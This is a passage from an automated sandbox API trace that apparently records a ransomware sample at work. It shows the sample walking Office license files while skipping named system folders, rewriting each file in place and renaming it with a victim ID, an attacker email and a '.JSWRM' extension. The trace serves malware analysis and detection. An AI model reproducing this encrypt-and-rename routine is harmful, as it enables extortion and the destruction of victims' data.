hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.196] CloseHandle (hObject=0x45c) returned 1 [0112.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0112.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0112.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0112.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0112.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0112.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0112.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.197] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordVL_KMS_Client-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordvl_kms_client-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordVL_KMS_Client-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordvl_kms_client-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0112.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0112.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0112.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0112.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0112.198] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xed5eb1ce, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed5eb1ce, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xee0334cc, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x257c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="WordVL_KMS_Client-ul.xrm-ms", cAlternateFileName="WOA2FE~1.XRM")) returned 1 [0112.198] lstrcmpiW (lpString1="WordVL_KMS_Client-ul.xrm-ms", lpString2=".") returned 1 [0112.198] lstrcmpiW (lpString1="WordVL_KMS_Client-ul.xrm-ms", lpString2="..") returned 1 [0112.198] lstrcmpiW (lpString1="WordVL_KMS_Client-ul.xrm-ms", lpString2="...") returned 1 [0112.198] lstrcmpiW (lpString1="WordVL_KMS_Client-ul.xrm-ms", lpString2="windows") returned 1 [0112.198] lstrcmpiW (lpString1="WordVL_KMS_Client-ul.xrm-ms", lpString2="recovery") returned 1 [0112.198] lstrcmpiW (lpString1="WordVL_KMS_Client-ul.xrm-ms", lpString2="perflogs") returned 1 [0112.198] lstrcmpiW (lpString1="WordVL_KMS_Client-ul.xrm-ms", lpString2="documents and settings") returned 1 [0112.198] lstrcmpiW (lpString1="WordVL_KMS_Client-ul.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0112.198] lstrcmpiW (lpString1="WordVL_KMS_Client-ul.xrm-ms", lpString2="system volume information") returned 1 [0112.198] lstrcmpiW (lpString1="WordVL_KMS_Client-ul.xrm-ms", lpString2="msocache") returned 1 [0112.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0112.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordVL_KMS_Client-ul.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0112.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0112.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordVL_KMS_Client-ul.xrm-ms", cchWideChar=27, lpMultiByteStr=0x240fe8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordVL_KMS_Client-ul.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0112.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0112.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0112.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordVL_KMS_Client-ul.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0112.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0112.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordVL_KMS_Client-ul.xrm-ms", cchWideChar=27, lpMultiByteStr=0x240ef8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordVL_KMS_Client-ul.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0112.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0112.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0112.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0112.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0112.198] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordVL_KMS_Client-ul.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordvl_kms_client-ul.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.199] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9596) returned 1 [0112.199] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2570) returned 0x24c1d0 [0112.199] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2570, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2570, lpOverlapped=0x0) returned 1 [0112.203] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.203] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2570, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2570, lpOverlapped=0x0) returned 1 [0112.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.203] CloseHandle (hObject=0x45c) returned 1 [0112.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0112.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0112.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0112.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0112.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0112.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0112.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0112.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0112.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.204] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordVL_KMS_Client-ul.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordvl_kms_client-ul.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordVL_KMS_Client-ul.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordvl_kms_client-ul.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0112.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0112.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0112.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0112.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0112.208] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xed1befd8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed1befd8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xed25796c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2977, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="WordVL_MAK-pl.xrm-ms", cAlternateFileName="WORDVL~4.XRM")) returned 1 [0112.208] lstrcmpiW (lpString1="WordVL_MAK-pl.xrm-ms", lpString2=".") returned 1 [0112.208] lstrcmpiW (lpString1="WordVL_MAK-pl.xrm-ms", lpString2="..") returned 1 [0112.208] lstrcmpiW (lpString1="WordVL_MAK-pl.xrm-ms", lpString2="...") returned 1 [0112.208] lstrcmpiW (lpString1="WordVL_MAK-pl.xrm-ms", lpString2="windows") returned 1 [0112.208] lstrcmpiW (lpString1="WordVL_MAK-pl.xrm-ms", lpString2="recovery") returned 1 [0112.208] lstrcmpiW (lpString1="WordVL_MAK-pl.xrm-ms", lpString2="perflogs") returned 1 [0112.208] lstrcmpiW (lpString1="WordVL_MAK-pl.xrm-ms", lpString2="documents and settings") returned 1 [0112.208] lstrcmpiW (lpString1="WordVL_MAK-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0112.208] lstrcmpiW (lpString1="WordVL_MAK-pl.xrm-ms", lpString2="system volume information") returned 1 [0112.208] lstrcmpiW (lpString1="WordVL_MAK-pl.xrm-ms", lpString2="msocache") returned 1 [0112.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordVL_MAK-pl.xrm-ms", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0112.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0112.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordVL_MAK-pl.xrm-ms", cchWideChar=20, lpMultiByteStr=0x241330, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordVL_MAK-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 20 [0112.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0112.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordVL_MAK-pl.xrm-ms", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0112.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0112.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordVL_MAK-pl.xrm-ms", cchWideChar=20, lpMultiByteStr=0x2413a8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordVL_MAK-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 20 [0112.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0112.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0112.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0112.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0112.209] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordVL_MAK-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordvl_mak-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.211] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10615) returned 1 [0112.211] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2970) returned 0x24c1d0 [0112.211] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2970, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2970, lpOverlapped=0x0) returned 1 [0112.213] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.213] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2970, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2970, lpOverlapped=0x0) returned 1 [0112.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0112.213] CloseHandle (hObject=0x45c) returned 1 [0112.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0112.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0112.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0112.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0112.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0112.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0112.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0112.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0112.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0112.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0112.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0112.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0112.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0112.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0112.214] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordVL_MAK-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordvl_mak-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordVL_MAK-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordvl_mak-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0112.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0112.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0112.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0112.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0112.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0112.215] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xed20b499, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xed20b499, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xed362a6d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x19f6, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="WordVL_MAK-ppd.xrm-ms", cAlternateFileName="WOF1B4~1.XRM")) returned 1 [0112.215] lstrcmpiW (lpString1="WordVL_MAK-ppd.xrm-ms", lpString2=".") returned 1 [0112.215] lstrcmpiW (lpString1="WordVL_MAK-ppd.xrm-ms", lpString2="..") returned 1 [0112.215] lstrcmpiW (lpString1="WordVL_MAK-ppd.xrm-ms", lpString2="...") returned 1 [0112.215] lstrcmpiW (lpString1="WordVL_MAK-ppd.xrm-ms", lpString2="windows") returned 1 [0112.215] lstrcmpiW (lpString1="WordVL_MAK-ppd.xrm-ms", lpString2="recovery") returned 1 [0112.215] lstrcmpiW (lpString1="WordVL_MAK-ppd.xrm-ms", lpString2="perflogs") returned 1 [0112.215] lstrcmpiW (lpString1="WordVL_MAK-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0112.215] lstrcmpiW (lpString1="WordVL_MAK-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0112.215] lstrcmpiW (lpString1="WordVL_MAK-ppd.xrm-ms", lpString2="system volume information") returned 1 [0112.215] lstrcmpiW (lpString1="WordVL_MAK-ppd.xrm-ms", lpString2="msocache") returned 1 [0112.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordVL_MAK-ppd.xrm-ms", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0112.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0112.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordVL_MAK-ppd.xrm-ms", cchWideChar=21, lpMultiByteStr=0x2410d8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordVL_MAK-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 21 [0112.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0112.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordVL_MAK-ppd.xrm-ms", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0112.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0112.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WordVL_MAK-ppd.xrm-ms", cchWideChar=21, lpMultiByteStr=0x2412e0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WordVL_MAK-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 21 [0112.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0112.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0112.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0112.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0112.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0112.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0112.216] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\WordVL_MAK-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\wordvl_mak-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0112.216] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=6646) returned 1 [0112.216] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0112.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x19f0) returned 0x205850 [0112.216] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0x19f0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0x19f0, lpOverlapped=0x0) returned 1 [0112.218] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, 